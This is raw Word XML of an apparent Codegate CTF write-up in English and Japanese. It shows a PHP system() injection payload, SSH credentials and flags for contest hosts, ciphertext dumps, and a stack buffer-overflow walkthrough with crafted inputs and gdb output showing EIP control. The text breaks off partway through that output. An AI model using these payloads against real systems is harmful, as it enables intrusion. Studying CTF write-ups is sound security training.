                      <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>do endless loop</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE74E0" w:rsidRDefault="00BE74E0" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B672C" w:rsidRDefault="002B672C" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B672C" w:rsidRDefault="002B672C" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Mach the Client1's PID and loadavg's PID, we can get </w:t>
      </w:r>
      <w:r w:rsidRPr="009953C5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;?php system('ls -la') ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> results, and get file list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B672C" w:rsidRDefault="002B672C" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B672C" w:rsidRPr="002B672C" w:rsidRDefault="002B672C" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>we can see file name of "</w:t>
      </w:r>
      <w:r w:rsidRPr="009953C5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> MUST_GRAB_THIS_KEY_FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B672C" w:rsidRDefault="009953C5" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009953C5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>http://ctf7.codegate.org/31337/index.php?page=MUST_GRAB_THIS_KEY_FILE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B672C" w:rsidRDefault="002B672C" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>we can ge key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE74E0" w:rsidRDefault="00BE74E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B672C" w:rsidRDefault="002B672C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="00591E9D" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1074" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc257340752"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:1200  </w:t>
      </w:r>
      <w:r>
        <w:t>Not cleared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2112" type="#_x0000_t202" style="width:437.4pt;height:45.1pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2112" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="009953C5">
                  <w:r>
                    <w:t>credentials: ssh hugh@ctf4.codegate.org -p 9474 password=takeitaway</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="009953C5"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="009953C5">
                  <w:r>
                    <w:t>Exploit /home/hugh/yboy to read secret.key</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1075" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc257340753"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:300   </w:t>
      </w:r>
      <w:r>
        <w:t>Cleared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Answer:Block_Ciphers=NSA_Conspiration</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2110" type="#_x0000_t202" style="width:437.4pt;height:63.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2110" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="009953C5">
                  <w:r>
                    <w:t>credentials: ctf3.codegate.org port 20909</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="009953C5"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="009953C5">
                  <w:r>
                    <w:t>Julianor doesn't understand why block ciphers exist, too complex.. just use his super secure message service.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>walk-thorough is</w:t>
      </w:r>
      <w:r w:rsidR="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>http://www.sabamiso.net/yoggy/tdiary/?date=20100316#p01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2109" type="#_x0000_t202" style="width:399.85pt;height:431.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2109" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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 ./prob3.rb</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0b ec 2a c1 2b ad 99 fa</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1f 91 91 80 b5 f9 33 25</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27 fe e3 ca 85 69 59 7d</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e9 60 f5 86 52 f8 49 a1</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61 e2 ce 45 dc 49 91 82</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95 39 b2 3e 5f 11 8d d3</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ec 22 54 d6 b0 59 7c 0b</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fc ff d3 de 1c ca 88 26</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0b f2 bb 8e c2 19 01 a5</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1b d2 fa 2b b2 38 c7 be</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66 91 82 97 22 5b 4e 37</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d4 cb 7a 2f 6c 20 74 96</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33 2d 92 86 58 2e d9 9b</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d5 5b c8 3e ff 18 6f ac</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db 59 89 ef 03 ed a1 d5</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57 be fe e9 71 40 ba 83</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de 3c a4 31 bf 0f 2e c2</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8a 3a 63 83 b0 da d3 15</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88 b2 6e bf e1 a8 93 fc</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8a 59 4d 8a 4b 4a 5e 2b</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fb a7 04 24 d4 82 e3 87</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a3 5b 69 b7 f2 b0</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01 e6 6e a4 4a df b9 b9</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4b d7 b1 d0 d9 98 4a 40</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55 d2 e9 93 ea 1c 2b 5d</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8f 0c 94 e1 72 91 3a 9b</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41 a0 a2 2a bf 22 ce c1</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fc 49 da 5b 2d 62 b0 9d</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bf 63 0b 95 df 37 0f 7b</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95 8d b2 aa 75 a5 e6 2c</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01 df 96 84 8e 54 2b 8f</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="001A317E">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>29 fc f0</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
                  <w:r w:rsidRPr="001A317E">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>"\n\nDear CTF Player,\nYour flag is: Block_Ciphers=NSA_Conspiration\n\n--\nLM**2.\n"</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00CC038C">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00AA5FD6">
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:rect id="_x0000_i1076" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc257340754"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:300   </w:t>
      </w:r>
      <w:r>
        <w:t>Cleared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B77BE6" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Answer:bc15d4ddf6ca486682064ad226a7ff1b</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2107" type="#_x0000_t202" style="width:437.4pt;height:45.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2107" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B">
                  <w:r>
                    <w:t>credentials: ctf4.codegate.org 9000</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00EB4B4B" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B">
                  <w:r>
                    <w:t>BINARY FILE: http://ctf.codegate.org/files____/easy</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FF3A35">
        <w:t>walk-thorough is</w:t>
      </w:r>
      <w:r w:rsidR="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r w:rsidR="00FF3A35">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>http://www.sabamiso.net/yoggy/tdiary/?date=20100320#p01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC038C" w:rsidRPr="00CC038C" w:rsidRDefault="00CC038C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC038C" w:rsidRDefault="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>実行時に適当なバッファを渡す</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC038C" w:rsidRDefault="00CC038C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC038C" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2106" type="#_x0000_t202" style="width:399.85pt;height:58.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2106" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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 python -c 'print "A"*264' | ./easy</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 xml:space="preserve">Input: </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Thanks. Goodbye</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Segmentation fault</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w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC038C" w:rsidRDefault="00CC038C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>264</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイトで</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Segmentation fault</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>する</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC038C" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>試しに</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>272</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイト程度を送る</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC038C" w:rsidRDefault="00CC038C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2105" type="#_x0000_t202" style="width:399.85pt;height:95.65pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2105" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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 python -c 'print "A"*260+"BBBB"+"CCCC"+"DDDD"' &gt; b272</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 gdb easy</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GNU gdb 6.8-debian</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(gdb) r &lt; b272</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Starting program: /home/Temp/easy &lt; b272</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 xml:space="preserve">Input: </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Program received signal SIGSEGV, Segmentation fault.</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0x44444444 in ?? ()</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>が</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>DDDD</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0x44444444</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:t>に書き変わった</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2104" type="#_x0000_t202" style="width:399.85pt;height:84.1pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2104" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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(gdb) i r eax</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eax            0xbfcfc3d0</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>-1076902960</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(gdb) x/16x $eax-4</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0xbfcfc3cc:</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x00000801</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
